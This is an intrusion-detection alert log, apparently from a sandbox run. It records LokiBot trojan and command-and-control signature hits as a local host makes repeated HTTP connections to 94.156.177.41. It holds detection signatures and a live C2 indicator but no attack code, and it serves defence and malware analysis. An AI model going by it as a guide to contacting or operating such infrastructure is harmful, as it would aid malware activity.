2025-01-11T01:43:34.659023+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:35.532934+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:36.403855+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:37.315630+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:38.226839+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:39.084674+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:39.967691+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:40.906466+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:41.803250+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:42.794250+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:43.674930+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:44.614068+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:45.582363+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:46.438299+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:47.295907+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:48.196551+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:49.076139+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:49.953109+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:50.836273+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:51.718554+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:52.590087+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:53.748109+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:54.614974+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:55.488808+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:56.636237+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:57.548619+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:58.432809+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:59.294217+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:44:00.168919+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:44:01.029999+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:01.911205+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:02.788148+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:03.775125+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:04.664084+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:05.575862+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:06.645085+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:07.690650+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:08.542955+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:09.524805+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:10.390018+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:11.267558+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:12.275424+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:13.186096+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:14.053421+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:14.935173+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:15.838515+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:16.721393+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:17.604119+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:18.481641+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:19.611694+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:20.466096+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:21.591884+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:22.440616+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:23.341846+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:24.227497+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:25.071196+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:25.895893+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51587	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:42:20.817288+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49704	94.156.177.41	80	TCP
2025-01-11T01:42:22.238848+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49705	94.156.177.41	80	TCP
2025-01-11T01:42:23.040247+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:23.920673+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:25.197136+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:26.102355+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:26.968789+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:28.135810+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:29.019551+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:29.891718+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:31.084444+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:31.992422+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:32.889368+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:34.065163+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:34.969892+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:35.848202+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:36.756536+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:37.616845+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:38.534914+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:39.453290+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:40.352448+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:41.207139+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:42.069381+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:42.979513+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:44.030365+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:44.878656+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:45.910982+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:46.766963+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:47.676875+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:48.545843+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:49.438319+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:50.341121+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:51.209451+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:52.288988+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:53.175499+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:54.184422+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:55.035617+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:55.992626+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:56.917464+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:57.813692+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:58.986101+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:43:00.003340+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:00.875736+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:01.944954+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:02.826098+0100	2021641	1	A Network Trojan was detected	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:03.707674+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:04.854034+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:05.736299+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:06.614277+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:07.773450+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:08.660221+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:09.514398+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:10.707200+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:11.607612+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:12.528797+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:13.572275+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:14.611221+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:15.469661+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:16.338867+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:17.186517+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:18.171449+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:19.049624+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:19.935376+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:20.826439+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:21.716741+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:22.578331+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:23.456554+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:24.327063+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:25.184735+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:26.109254+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:26.979791+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:27.847811+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:28.764296+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:29.742691+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:30.877186+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:31.748335+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:32.607831+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:33.949545+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:34.814322+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:35.685742+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:36.565085+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:37.485335+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:38.387023+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:39.246713+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:40.188662+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:41.063388+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:42.036690+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:42.952923+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:43.902308+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:44.785246+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:45.736146+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:46.597242+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:47.457823+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:48.358447+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:49.238277+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:50.112871+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:50.991939+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:51.872833+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:53.011219+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:53.904054+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:54.763804+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:55.926731+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:56.799040+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:57.706794+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:58.606872+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:43:59.461313+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:44:00.327731+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:01.206037+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:02.066708+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:03.052322+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:03.938794+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:04.874883+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:05.900134+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:06.794404+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:07.842580+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:08.809214+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:09.691470+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:10.558794+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:11.428450+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:12.445729+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:13.353273+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:14.206617+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:15.088828+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:16.015685+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:16.870270+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:17.776454+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:18.905117+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:19.764965+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:20.625881+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:21.737700+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:22.607373+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:23.517156+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:24.362511+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:25.207598+0100	2021641	1	A Network Trojan was detected	192.168.2.8	51587	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:42:20.817288+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49704	94.156.177.41	80	TCP
2025-01-11T01:42:22.238848+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49705	94.156.177.41	80	TCP
2025-01-11T01:42:23.040247+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:23.920673+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:25.197136+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:26.102355+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:26.968789+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:28.135810+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:29.019551+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:29.891718+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:31.084444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:31.992422+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:32.889368+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:34.065163+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:34.969892+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:35.848202+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:36.756536+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:37.616845+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:38.534914+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:39.453290+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:40.352448+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:41.207139+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:42.069381+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:42.979513+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:44.030365+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:44.878656+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:45.910982+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:46.766963+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:47.676875+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:48.545843+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:49.438319+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:50.341121+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:51.209451+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:52.288988+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:53.175499+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:54.184422+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:55.035617+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:55.992626+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:56.917464+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:57.813692+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:58.986101+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:43:00.003340+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:00.875736+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:01.944954+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:02.826098+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	49750	94.156.177.41	80	TCP
